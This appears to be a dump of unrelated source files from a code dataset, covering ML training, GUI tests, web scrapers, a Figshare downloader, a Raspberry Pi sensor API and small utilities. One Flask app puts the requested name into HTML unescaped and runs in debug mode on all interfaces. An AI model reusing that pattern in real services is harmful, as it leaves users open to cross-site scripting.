tf.gfile.Exists(FLAGS.log_dir):\r\n\t\ttf.gfile.DeleteRecursively(FLAGS.log_dir)\r\n\ttf.gfile.MakeDirs(FLAGS.log_dir)\r\n\ttrain()\r\n \r\nif __name__ == '__main__':\r\n\tflags = tf.app.flags\r\n\tFLAGS = flags.FLAGS\r\n\tflags.DEFINE_boolean('FakeData', False, 'If true, uses fake data for unit testing.')\r\n\tflags.DEFINE_integer('max_step', 100001, 'Number of steps to run trainer.')\r\n\tflags.DEFINE_float('lr', 0.0001, 'Initial learning rate.')\r\n\tflags.DEFINE_float('dropout', 0.75, 'Keep probability for training dropout.')\r\n\tflags.DEFINE_string('data_dir', '/home/huaminz2/cs498/hw8/mnist/advanced/input_data', 'Directory for storing data')\r\n\tflags.DEFINE_string('log_dir', '/home/huaminz2/cs498/hw8/mnist/advanced/mnist_with_summaries', 'Summaries log directory')\r\n\t#parser.add_argument('--fake_data', nargs='?', const=True, type=bool,default=False,help='If true, uses fake data for unit testing.')\r\n\t#parser.add_argument('--max_steps', type=int, 
default=1000,help='Number of steps to run trainer.')\r\n\t#parser.add_argument('--learning_rate', type=float, default=0.001,help='Initial learning rate')\r\n\t#parser.add_argument('--dropout',type=float, default=0.9,help='Keep probability for training dropout.')\r\n\t#parser.add_argument('--data_dir',type=str,default='/tmp/tensorflow/mnist/input_data',help='Directory for storing input data')\r\n\t#parser.add_argument('--log_dir',type=str,default='/tmp/tensorflow/mnist/logs/mnist_with_summaries',help='Summaries log directory')\r\n\t#FLAGS, unparsed = parser.parse_known_args()\r\n\ttf.app.run()\r\n\t\t\t\r\n\t\r\n \r\n","sub_path":"CNN_MNIST&CIFAR(Tensorflow)/result&script/mnist/advanced/HW8_mnist3.py","file_name":"HW8_mnist3.py","file_ext":"py","file_size_in_byte":6487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224957223","text":"import unittest\n\nfrom PyQt5.QtCore import QPoint\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtTest import QTest\n\nimport tests.utils_testing\nfrom urh import constants\nfrom urh.controller.MainController import MainController\n\nfrom tests.utils_testing import get_path_for_data_file\n\napp = tests.utils_testing.app\n\n\nclass TestAnalysisTabGUI(unittest.TestCase):\n def setUp(self):\n constants.SETTINGS.setValue(\"not_show_close_dialog\", True) # prevent interactive close questions\n self.form = MainController()\n self.cfc = self.form.compare_frame_controller\n self.form.add_signalfile(get_path_for_data_file(\"two_participants.complex\"))\n self.signal = self.form.signal_tab_controller.signal_frames[0].signal\n self.signal.noise_threshold = 0.0175\n self.signal.qad_center = 0\n self.signal.bit_len = 100\n self.signal.tolerance = 5\n\n def test_analyze_button_fsk(self):\n self.form.add_signalfile(get_path_for_data_file(\"fsk.complex\"))\n self.cfc.ui.btnAnalyze.click()\n self.assertTrue(True)\n\n def test_analyze_button_enocean(self):\n 
self.form.add_signalfile(get_path_for_data_file(\"enocean.complex\"))\n w = self.form.signal_tab_controller.signal_frames[1].ui.spinBoxCenterOffset\n w.setValue(0)\n QTest.keyClick(w, Qt.Key_Enter)\n w = self.form.signal_tab_controller.signal_frames[1].ui.spinBoxNoiseTreshold\n w.setValue(0.0111)\n QTest.keyClick(w, Qt.Key_Enter)\n self.cfc.ui.btnAnalyze.click()\n self.assertTrue(True)\n\n def test_table_selection(self):\n self.form.ui.tabWidget.setCurrentIndex(1)\n self.cfc.ui.cbProtoView.setCurrentIndex(0)\n self.cfc.ui.btnAnalyze.click()\n\n self.cfc.ui.tblViewProtocol.selectRow(1)\n app.processEvents()\n self.assertEqual(self.cfc.ui.lBitsSelection.text(), self.cfc.proto_analyzer.messages[1].plain_bits_str)\n\n self.cfc.ui.tblViewProtocol.clearSelection()\n app.processEvents()\n self.assertEqual(\"\", self.cfc.ui.lBitsSelection.text())\n\n self.cfc.ui.tblViewProtocol.select(0, 0, 0, 3)\n app.processEvents()\n self.assertEqual(\"1010\", self.cfc.ui.lBitsSelection.text())\n self.cfc.ui.cbProtoView.setCurrentIndex(1)\n min_row, max_row, start, end = self.cfc.ui.tblViewProtocol.selection_range()\n self.assertEqual(min_row, 0)\n self.assertEqual(max_row, 0)\n self.assertEqual(start, 0)\n self.assertEqual(end, 1)\n\n def test_search(self):\n search_str = \"100110001\"\n self.cfc.ui.cbProtoView.setCurrentIndex(0)\n self.cfc.ui.tblViewProtocol.clearSelection()\n self.cfc.ui.lineEditSearch.setText(search_str)\n self.cfc.ui.btnSearchSelectFilter.click()\n\n selected_now = self.cfc.ui.tblViewProtocol.selectedIndexes()\n self.assertEqual(len(self.cfc.ui.tblViewProtocol.selectedIndexes()), len(search_str))\n\n self.cfc.ui.btnNextSearch.click()\n self.assertNotEqual(selected_now, self.cfc.ui.tblViewProtocol.selectedIndexes())\n\n self.cfc.ui.btnPrevSearch.click()\n self.assertEqual(selected_now, self.cfc.ui.tblViewProtocol.selectedIndexes())\n\n self.cfc.select_action.trigger()\n self.assertEqual(self.cfc.ui.btnSearchSelectFilter.text(), \"Select all\")\n 
self.cfc.ui.btnSearchSelectFilter.click()\n self.assertGreater(len(self.cfc.ui.tblViewProtocol.selectedIndexes()), len(selected_now))\n\n self.cfc.filter_action.trigger()\n self.assertEqual(self.cfc.ui.btnSearchSelectFilter.text(), \"Filter\")\n self.cfc.ui.btnSearchSelectFilter.click()\n hidden_rows = [i for i in range(self.cfc.protocol_model.row_count)\n if self.cfc.ui.tblViewProtocol.isRowHidden(i)]\n\n self.assertEqual(hidden_rows, [0, 5, 6, 10, 13, 14, 16, 17])\n\n def test_show_diff(self):\n hidden_columns_before = [i for i in range(self.cfc.protocol_model.col_count)\n if self.cfc.ui.tblViewProtocol.isColumnHidden(i)]\n self.assertEqual(len(hidden_columns_before), 0)\n\n self.cfc.ui.chkBoxShowOnlyDiffs.click()\n self.assertTrue(self.cfc.ui.cbShowDiffs.isChecked())\n\n hidden_columns_now = [i for i in range(self.cfc.protocol_model.col_count)\n if self.cfc.ui.tblViewProtocol.isColumnHidden(i)]\n\n self.assertNotEqual(hidden_columns_before, hidden_columns_now)\n\n self.cfc.ui.chkBoxOnlyShowLabelsInProtocol.click()\n\n hidden_columns_now = [i for i in range(self.cfc.protocol_model.col_count)\n if self.cfc.ui.tblViewProtocol.isColumnHidden(i)]\n\n self.assertEqual(len(hidden_columns_now), self.cfc.protocol_model.col_count)\n\n def test_add_message_type(self):\n self.assertEqual(len(self.cfc.proto_analyzer.message_types), 1)\n self.cfc.ui.btnAddMessagetype.click()\n self.assertEqual(len(self.cfc.proto_analyzer.message_types), 2)\n\n def test_create_context_menu(self):\n # Add protocol label should be disabled if table is empty\n self.form.close_all()\n self.assertEqual(self.cfc.protocol_model.rowCount(), 0)\n self.cfc.ui.tblViewProtocol.context_menu_pos = QPoint(0, 0)\n menu = self.cfc.ui.tblViewProtocol.create_context_menu()\n\n create_label_action = next(a for a in menu.actions() if a.text() == \"Add protocol label\")\n 
self.assertFalse(create_label_action.isEnabled())\n","sub_path":"tests/test_analysis_tab_GUI.py","file_name":"test_analysis_tab_GUI.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"412433224","text":"import sys\nimport io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\n\n\"\"\"\n\n\"\"\"\n\nfrom selenium import webdriver\n\noptions = webdriver.ChromeOptions()\noptions.headless = True\noptions.add_argument(\"window-siez=1920x1080\")\n\nbrowser = webdriver.Chrome(options=options)\n# browser.maximize_window()\n\n# 페이지 이동\nurl = \"https://play.google.com/store/movies/top\"\nbrowser.get(url)\n\n# 지정한 위치로 스크롤 내리기\n#browser.execute_script(\"window.scrollTo(0,1080)\") # 윈도우에서 세로 방향으로 1080(본인 컴퓨터 해상도)위치로 내려라..\n# browser.execute_script(\"window.scrollTo(0,2080)\")\n\n# 화면 가장 아래로 스크롤 내리기\n\n# browser.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\n\nimport time\ninterval = 5\n\nprev_height = browser.execute_script(\"return document.body.scrollHeight\")\n\nwhile True:\n # 스크롤을 가장 먼저 아래로\n browser.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\n time.sleep(interval)\n current_height = browser.execute_script(\"return document.body.scrollHeight\")\n if current_height == prev_height:\n break\n\n prev_height = current_height\nprint(\"scroll 완료\")\nbrowser.get_screenshot_as_file(\"google_movie.png\")\n\n\n# 스크래핑 작업 실시\n# 원래는 import 구문은 위에 있는 것이 문법에 맞다.\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nsoup = BeautifulSoup(browser.page_source,\"lxml\")\n\n# movies = soup.find_all(\"div\",attrs={\"class\":[\"ImZGtf mpg5gc\", \"Vpfmgd\"]}) # 클래스 2개로 찾기\nmovies = soup.find_all(\"div\",attrs={\"class\":\"Vpfmgd\"})\n\n# print(len(movies))\n\n# WsMG1c nnK0zc 영화들의 class\n# SUZt4c djCuy 할인가격이 있는 영화는 해당 class를 갖는다.\n# VfPpfd ZdBevf i5DZme 할인가격 클래스\n# 
JC71ub는 영화 link\nfor movie in movies:\n title = movie.find(\"div\",attrs={\"class\":\"WsMG1c nnK0zc\"}).get_text()\n # print(title)\n original_price = movie.find(\"span\",attrs={\"class\":\"SUZt4c djCuy\"})\n if original_price:\n original_price = original_price.get_text()\n else:\n # print(title,\"할인되지 않은 영화 제외\")\n continue\n\n # 할인된 가격\n price = movie.find(\"span\",attrs={\"class\":\"VfPpfd ZdBevf i5DZme\"}).get_text()\n\n # 링크\n link = movie.find(\"a\",attrs={\"class\":\"JC71ub\"})[\"href\"]\n print(f\"제목 : {title}\")\n print(f\"할인 전 금액 : {original_price}\")\n print(f\"할인 후 금액 : {price}\")\n print(\"링크 : \", \"https://play.google.com\"+link)\n print(\"-\"*120)\n\nbrowser.quit()\n\n# 웹 스크래핑 4:15:23초 완료.\n","sub_path":"webscraping_basic/17_headless_chrome.py","file_name":"17_headless_chrome.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16470209","text":"import logging\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\n\nlogger = logging.getLogger(__name__)\n\n\nclass NullHandler(logging.Handler):\n def emit(self, record):\n pass\nnullhandler = logger.addHandler(NullHandler())\n\n\nclass Base(object):\n\n def __init__(self, using=None):\n self._using = None\n self._set_using(using)\n\n def _set_using(self, value=None):\n \"\"\"Sets the using parameter for this machine, almost always a server.\n\n Args:\n value: valid settings DATABASE key. 
(default: default)\n\n \"\"\"\n if not value:\n value = 'default'\n self._using = value\n self.verify_using(value)\n\n def get_using(self):\n if not self._using:\n self._set_using()\n return self._using\n\n def verify_using(self, value):\n if value not in settings.DATABASES.keys():\n raise ImproperlyConfigured('Cannot find key \"{0}\" in settings.DATABASES.'.format(value))\n return True\n","sub_path":"edc/device/sync/classes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"398705948","text":"import os\nimport subprocess\n\n\ndef create_repo(name):\n repo_path = os.path.join('repos', '%s.git' % (name))\n print(repo_path)\n if os.path.isdir(repo_path):\n raise Exception(\"repo already exists\")\n os.mkdir(repo_path)\n\n proc = subprocess.Popen(('git', 'init', '--bare'),\n cwd=repo_path,\n stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n proc.wait()\n","sub_path":"selfgit/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"594036626","text":"import numpy as np\nimport cv2\nimport os\nfrom time import time\n\n\n#dirPath = '../frameChoice/active/closing/'\ndirPath = '../frameChoice/active/idle-arms-down/'\n\n#templateImg = cv2.imread(\"../frameChoice/template/transparent/morning-0.png\", -1) # this one has transparency\ntemplateImg = cv2.imread(\"../frameChoice/template/transparent/morning-0.png\", -1) # this one has transparency\n\n\nh, w, c = templateImg.shape\n\nfileList = os.listdir(dirPath)\n\nfor i,fileName in enumerate(fileList):\n print(i,'/',len(fileList))\n\n img1 = cv2.imread(dirPath + fileName,-1)\n img1 = cv2.resize(img1, (640,360), interpolation = cv2.INTER_AREA)\n\n result = np.zeros((h, w, 3), np.uint8)\n\n\n alpha = templateImg[:, :, 3] / 255.0\n result[:, :, 0] = (1. 
- alpha) * img1[:, :, 0] + alpha * templateImg[:, :, 0]\n result[:, :, 1] = (1. - alpha) * img1[:, :, 1] + alpha * templateImg[:, :, 1]\n result[:, :, 2] = (1. - alpha) * img1[:, :, 2] + alpha * templateImg[:, :, 2]\n\n\n\n cv2.imwrite(dirPath+fileName,result)\n\n","sub_path":"scripts/overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"206216544","text":"import requests\nfrom bs4 import BeautifulSoup\n\nquestions = []\nanswers = []\n\n\n# script https://coin.cashbet.com/faq/\ndef loadWord():\n quote_page = \"https://coin.cashbet.com/faq/\"\n page = requests.get(quote_page)\n soup = BeautifulSoup(page.content, \"html.parser\")\n # questions are in
\n for s in soup.findAll('a'):\n questions.append(s.findAll(text=True))\n\n # answers are in \n for s in soup.findAll('div', {\"class\": \"panel-body\"}):\n answer = \"\"\n # each paragraph is in

\n for p in s.findAll('p'):\n paragraph = p.findAll(text=True)\n if paragraph != []:\n if answer == \"\":\n answer += paragraph[0]\n else:\n answer = answer + \" \" + paragraph[0]\n # scraping youtube video url\n for url in p.find_all('iframe'):\n if answer == \"\":\n answer += url['src']\n else:\n answer = answer + \" \" + url['src']\n # scraping bullet points\n for li in s.findAll('li'):\n list_ = li.findAll(text=True)\n answer = answer + \" \" + list_[0]\n answers.append(answer)\n # for url in soup.find_all('iframe'):\n # print(url['src'])\n # for s in soup.findAll('p'):\n # answers.append(s.findAll(text=True))\n # answers.append(s.findAll(text=True)) for s in soup.findAll('p'))\n # print(answers)\n return (questions, answers)\n\n\n# write data in text files\ndef write_data_txt(scripted_data):\n questions, answers = scripted_data\n # create text file for questions\n questions_txt_file = open(\"questions.text\", \"w\")\n # create text file for answers\n answers_txt_file = open(\"answers.text\", \"w\")\n for question in questions:\n if question != []:\n # to get only question sentense, filters by ?\n if question[0][len(question[0])-1] == \"?\":\n questions_txt_file.write(question[0] + \"\\n\")\n questions_txt_file.close()\n for answer in answers:\n # if answer != []:\n answers_txt_file.write(answer + \"\\n\")\n answers_txt_file.close()\n\n\ndef main():\n scripted_data = loadWord()\n write_data_txt(scripted_data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"CashBet_webscraping.py","file_name":"CashBet_webscraping.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"387149528","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 28 09:41:18 2021\n\n@author: padma carstens\n\"\"\"\n\nimport os\nfrom os.path import exists\nimport json\nfrom ldcoolp.curation import retrieve\n\n#Enter article id for published articles:this is the also last number in the 
\"cite\" on data.lib.vt.edu \narticle_id=1234\n#Enter your token below\ntoken='1234'\n#Enter published accession number from the spreadsheet\nPublishedAccessionNumber= \"P123\"\n#Enter requestor name\nRequestor=\"XYZ\"\n#Enter corresponding author name\nCorrespondingAuthor=\"XYZ\"\n#Enter version\nVersion=\"01\"\n#Enter published date in YYYYMMDD format \nDatePublished= \"20211025\" \n\n#Create Publication folder to store dataset\ndata_directory1=f\"{PublishedAccessionNumber}_v{Version}\"\ndata_directory2=f\"{PublishedAccessionNumber}_{Requestor}_{CorrespondingAuthor}_v{Version}_{DatePublished}\"\ndata_directory3=f\"DisseminatedContent\"\ndata_directory_path=os.path.join(data_directory1, data_directory2, data_directory3)\nmetadata_directory_path=f\"{PublishedAccessionNumber}_DownloadedFileMetadata_v{Version}\"\n#-----Download dataset for published article using LD-Cool-P and save it as publication meta data in json file format\npublicfigshare_url='https://api.figshare.com/v2/articles/'+str(article_id)\nfrom figshare.figshare import Figshare\nfs=Figshare(token=token,private=False)\nFileDownload=retrieve.download_files(article_id, fs, data_directory=data_directory_path, metadata_directory=metadata_directory_path)\n#-----get article details for published article using LD-Cool-P and save it as published metadata in json file format\njson_out_file1=f\"{data_directory_path}/{PublishedAccessionNumber}_DisseminatedMetadata.json\"\njson_response1=fs.get_article_details(article_id,version=None)\n\n\nif not os.path.exists(json_out_file1):\n with open(json_out_file1, 'w') as f:\n json.dump(json_response1,f,indent=4)\nelse:\n print(f\"File exists: {json_out_file1}\")\n if overwrite:\n print(\"Overwriting!\")\n with open(json_out_file1, 'w') as f:\n json.dump(json_response1,f,indent=4)\n \n#----------------------create VTCurationServicesActions folder to save provenance log and email correspondence\n \ndata_directory4=f\"VTCurationServicesActions\" 
\ndata_directory_path2=os.path.join(data_directory1,data_directory2,data_directory4)\nos.mkdir(data_directory_path2)\nprint(\"Directory '% s' created\" % data_directory4) \n","sub_path":"create_publication_bag.py","file_name":"create_publication_bag.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"551483469","text":"# -- coding: utf-8 --\n\n'''\n 代销公募基金基本信息和净值数据\n'''\n\nfrom fundSelect import fundPool\nimport pandas as pd\nfrom datetime import datetime,date\nimport numpy as np\nfrom PrintInfo import PrintInfo\nfrom GetHistoryData.GetProductData import GetProductData\n\nclass SetPortfolio:\n def __init__(self,assetIndex={},backDate=date.today().strftime('%Y-%m-%d')):\n self.dicProduct = fundPool.getFundPool()\n self.getInfoFlag = True\n self.backDate = backDate\n self.assetIndex = assetIndex #大类资产指数\n self.PrintInfoDemo = PrintInfo() # 日志信息模块\n\n #初步过滤基金池,并对基金池归类\n def firstSelect(self, fundInfoDf):\n def dateFormat(tempSe):\n tempList = [tempSe[k].strftime('%Y-%m-%d') for k in tempSe.index.tolist()]\n resutlt = pd.Series(tempList,index=tempSe.index)\n return resutlt\n\n #过滤掉成立日期小于指定日期的基金\n fundInfoDf['FUND_SETUPDATE'] = dateFormat(fundInfoDf['FUND_SETUPDATE'])\n fundDf = fundInfoDf.loc[fundInfoDf['FUND_SETUPDATE']<=self.backDate]\n\n #过滤掉定期开放的基金\n fundDf['nameFlag'] = [name.find(u'定期开放') for name in fundDf['FUND_FULLNAME'].tolist()]\n fundDf = fundDf[fundDf['nameFlag']==-1]\n fundDf.drop(labels=['nameFlag'],axis=1,inplace=True)\n\n #按照基金的二级分类,对基金池划分\n dicFundStyle = {}\n for typeName,tempDf in fundDf.groupby(['FUND_INVESTTYPE']):\n dicFundStyle[typeName] = tempDf\n return dicFundStyle\n\n #再次处理基金池,返回大类对应的产品和基金净值数据\n def secondSelect(self,dicFundDf,fundNetValueUpdateDf):\n dicResult = {}\n # if u'被动指数型基金' in dicFundDf:\n # tempETFDf = dicFundDf[u'被动指数型基金']\n\n dicResult['000016.SH'] =['110020.OF']\n dicResult['000300.SH'] = ['270010.OF']\n dicResult['000905.SH'] = 
['162711.OF','110026.OF']\n dicResult['SPX.GI'] = ['270042.OF']\n dicResult['CBA00601.CS'] = ['001021.OF']\n # dicResult['AU9999.SGE'] = ['002610.OF']\n dicResult['AU9999.SGE'] = ['518800.OF']\n\n totalSelectList = []\n for key,value in dicResult.items():\n totalSelectList = totalSelectList+value\n resultDf = fundNetValueUpdateDf[totalSelectList]\n return dicResult,resultDf\n\n #整理净值数据\n def settleFundNetValue(self,fundInfoDf,fundNetValueDf):\n def fifteData(tempSe):\n startDate = fundInfoDf.ix[tempSe.name, 'FUND_SETUPDATE']\n tempSe[tempSe.indexOne pageOne looove\"\"\")\n self.assertEqual(page.parse_media(), [])\n\n def test_media_returns_all_images_attributes(self):\n html = u\"\"\"\n

One page

\n

Yéâh

\n \"image-1\"/\n \n \n \n \"\"\"\n page = FlatPage(content=html)\n self.assertEqual(page.parse_media(), [\n {'url': '/media/image1.png', 'title': 'Image 1', 'alt': 'image-1', 'mimetype': ['image', 'png']},\n {'url': '/media/image2.jpg', 'title': '', 'alt': '', 'mimetype': ['image', 'jpeg']}\n ])\n\n def test_flatpages_is_a_link(self):\n html = u\"http://www.makina-corpus.com\"\n page = FlatPage(content=html)\n self.assertEqual(page.link, 'http://www.makina-corpus.com')\n","sub_path":"rando/flatpages/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"59020881","text":"import pandas as pd\nimport numpy as np\nfrom scipy import interp\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import roc_curve, auc\nfrom matplotlib import pyplot as plt\n\n\ndef modeling(feature):\n feature_labels = pd.read_excel(\"../cache/feature_21D_hg18_0507.xls\", sheetname='y').columns[4:, ]\n feature_labels = [feature_label.split(\"E017-\")[1] for feature_label in feature_labels]\n labels = []\n for i in feature_labels:\n if str(i).split('_')[0] not in labels:\n labels.append(str(i).split('_')[0])\n df_y = pd.read_excel(feature, header=None, sheetname='y').fillna(0)\n df_n = pd.read_excel(feature, header=None, sheetname='n').fillna(0)\n df = df_y.append(df_n)\n # df = pd.read_csv(\"../cache/Xcov_Data.csv\", header=None).fillna(0)\n # index = [i for i in range(4, 25)] + [i for i in range(67, 88)] # index = [i for i in range(151, 172)]\n # index = [j for j in range(4 + 21 * i, 4 + 21 * (i + 1))]\n index = [i for i in range(4, df.shape[1])]\n data = df.iloc[:, index]\n data = np.matrix(data)\n target = df.iloc[:, 3]\n target = np.array(target)\n k_flods = StratifiedKFold(n_splits=10, shuffle=True)\n rf = RandomForestClassifier(n_estimators=500)\n tprs = []\n aucs = []\n mean_fpr = 
np.linspace(0, 1, 200)\n i = 0\n for train_index, test_index in k_flods.split(data, target):\n X_train, X_test = data[train_index], data[test_index]\n y_train, y_test = target[train_index], target[test_index]\n rf.fit(X_train, y_train)\n # 特征重要性\n importance = rf.feature_importances_\n # print(importance)\n # print(feature_labels)\n plt.bar(range(1, X_train.shape[1] + 1), importance, 0.5, align='center')\n plt.xlim(-1, 190)\n for i in np.arange(21.5, 180, 21):\n plt.vlines(i, 0, ymax=0.015, colors='m', linestyles=\"dashed\")\n plt.xticks(range(11, 189, 21), labels, fontsize=20)\n plt.yticks(fontsize=20)\n plt.xlabel('Features Type', fontsize=24)\n plt.ylabel('The Importance of Feature', fontsize=24)\n # plt.rc('xtick', labelsize=1)\n plt.tight_layout()\n plt.title(\"Feature importance\", fontsize=28)\n pixel = plt.gcf()\n pixel.set_size_inches(20, 12)\n pixel.savefig(\"../pic/feature_importance_0531.eps\", format='eps', dpi=1000)\n # plt.show()\n importances = importance.reshape(9, 21)\n plt.matshow(importances, cmap=plt.cm.hot)\n plt.colorbar().set_label(\"The importance of the features\", rotation=270, labelpad=20)\n plt.xticks(range(0, 21), range(-10, 11))\n plt.yticks(range(0, 9), labels)\n pixel = plt.gcf()\n pixel.savefig(\"../pic/feature_importance_0531_pixel.eps\", format='eps', dpi=1000)\n # plt.show()\n exit()\n y_pred_rf = rf.predict_proba(X_test)[:, 1]\n # print(y_pred_rf)\n # exit()\n fpr_rf, tpr_rf, _ = roc_curve(y_test, y_pred_rf)\n tprs.append(interp(mean_fpr, fpr_rf, tpr_rf))\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr_rf, tpr_rf)\n aucs.append(roc_auc)\n # plt.plot(fpr_rf, tpr_rf, label='ALL Feature %d, AUC=%0.3f' % (i, roc_auc))\n i += 1\n plt.plot([0, 1], [0, 1], 'k--')\n mean_tpr = np.mean(tprs, axis=0)\n mean_fpr[-1] = 1.0\n mean_auc = auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n plt.plot(mean_fpr, mean_tpr, label=\"Mean AUC=%0.3f $\\pm$ %0.3f\" % (mean_auc, std_auc))\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + 
std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n plt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='red', alpha=.2,\n label='$\\pm$ 1 std. dev.')\n plt.xlim([-0.05, 1.05])\n plt.ylim([-0.05, 1.05])\n plt.xlabel('False positive rate')\n plt.ylabel('True positive rate')\n plt.title('ROC curve')\n plt.legend()\n plt.show()\n\n\nif __name__ == \"__main__\":\n modeling(\"../cache/feature_21D_hg18_0506.xls\")\n","sub_path":"src_old/plot_roc_auc.py","file_name":"plot_roc_auc.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"536159879","text":"from flask import Flask, request, escape, render_template\nfrom werkzeug.exceptions import HTTPException, BadRequest\n\nimport random\n\n'''\nNotes on how to run locally:\n\nTo build docker in the local directory use the following and pass a name to call for run:\ndocker build --tag name . \n\nIf no name passed then note the pid and use that to run:\ndocker run -d -p 8080:8080 [name or id]\n\nStop the instance with:\ndocker stop [id - first 4]\n\nDeploy to registry\n'''\napp = Flask(__name__)\n\n@app.route('/', methods=['POST', 'GET'])\n@app.route('/', methods=['POST', 'GET'])\ndef say_hello(name='World'):\n\n color = \"%06x\" % random.randint(0, 0xFFFFFF)\n style = \"style=\\\"background-color:#\" + str(color) + \"\\\"\"\n combined_html = \"

Hello \" + name + \"!!!

\"\n\n # Option to simply return hello\n # return 'Hello {}!'.format(escape(name))\n # Option passes the generated html to the page\n return combined_html\n\n@app.errorhandler(404)\ndef not_found(error):\n return \"\"\"

404

\"\"\"\n\n #Option to use template \n #return render_template('home.hml')\n\n@app.errorhandler(BadRequest)\ndef handle_bad_request(e):\n return 'bad request!', 400\n\n@app.errorhandler(HTTPException)\ndef handle_exception(e):\n \"\"\"Return JSON instead of HTML for HTTP errors.\"\"\"\n # start with the correct headers and status code from the error\n response = e.get_response()\n # replace the body with JSON\n response.data = json.dumps({\n \"code\": e.code,\n \"name\": e.name,\n \"description\": e.description,\n })\n response.content_type = \"application/json\"\n return response\n\nif __name__ == '__main__':\n # Use when running locally\n #app.run(host='0.0.0.0', use_reloader=True, debug=True)\n\n app.run(host='0.0.0.0',port=8080, use_reloader=True, debug=True, threaded=True)","sub_path":"python/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207734417","text":"class Solution:\n def isRectangleCover(self, rectangles):\n area, corners = 0, set()\n a, c = lambda: (X - x) * (Y - y), lambda: {(x, y), (x, Y), (X, y), (X, Y)}\n for x, y, X, Y in rectangles:\n area += a()\n corners ^= c()\n x, y, X, Y = (f(z) for f, z in zip((min, min, max, max), zip(*rectangles)))\n return area == a() and corners == c()\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.isRectangleCover([[1, 1, 3, 3], [3, 1, 4, 2], [3, 2, 4, 4], [1, 3, 2, 4], [2, 3, 3, 4]]) is True)\n","sub_path":"Solutions/391. 
Perfect Rectangle/391.py","file_name":"391.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634925643","text":"import RPi.GPIO as GPIO\nfrom flask import Flask\nfrom flask import jsonify, request\nimport time\n\napp = Flask(__name__)\n\n@app.route(\"/fetchSensorData\", methods=['POST'])\ndef fetchSensorData():\n\n GPIO.setmode(GPIO.BCM)\n TRIG= int(request.form['TRIG'])\n ECHO = int(request.form['ECHO'])\n\n GPIO.setup(TRIG, GPIO.OUT)\n GPIO.setup(ECHO, GPIO.IN)\n\n GPIO.output(TRIG, False)\n print('waiting for sensor')\n time.sleep(2)\n\n GPIO.output(TRIG, True)\n time.sleep(0.00001)\n GPIO.output(TRIG, False)\n\n pulse_start = 0\n pulse_end = 0\n while GPIO.input(ECHO) == 0:\n pulse_start = time.time()\n\n while(GPIO.input(ECHO) == 1):\n pulse_end = time.time()\n\n pulse_duration = pulse_end - pulse_start\n distance = pulse_duration*17150\n distance = round(distance,2)\n\n GPIO.cleanup()\n \n sensor_data = {\"distance\": distance}\n\n return jsonify(sensor_data)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=80, debug=True)\n","sub_path":"FlaskCode/sensor_server.py","file_name":"sensor_server.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"590934490","text":"# _*_ coding : utf-8 -*-\n\n\"\"\"\nFlowGraphのtreeファイルから共起頻度を計算\n入力: viob2ファイル\n 各行 : レシピ1stepの文章\n スペース区切りで word/iob2tag\n 出力保存先ディレクトリ\n出力: co_occurrence.pickle\n keywordsのリスト\n 各keywordsの頻度\n 共起頻度を表す行列(インデックスは上記のリスト順) \n\"\"\"\n\nimport os\nimport argparse\nimport glob\nimport itertools\nimport pickle\nimport codecs\nimport pandas as pd\nimport numpy as np\n\n\nRECIPE = 1715343\n\n\ndef parse():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_path', help=u'入力ファイル')\n parser.add_argument('synonym_path', help=u'料理オントロジーファイル')\n parser.add_argument('output_dir', 
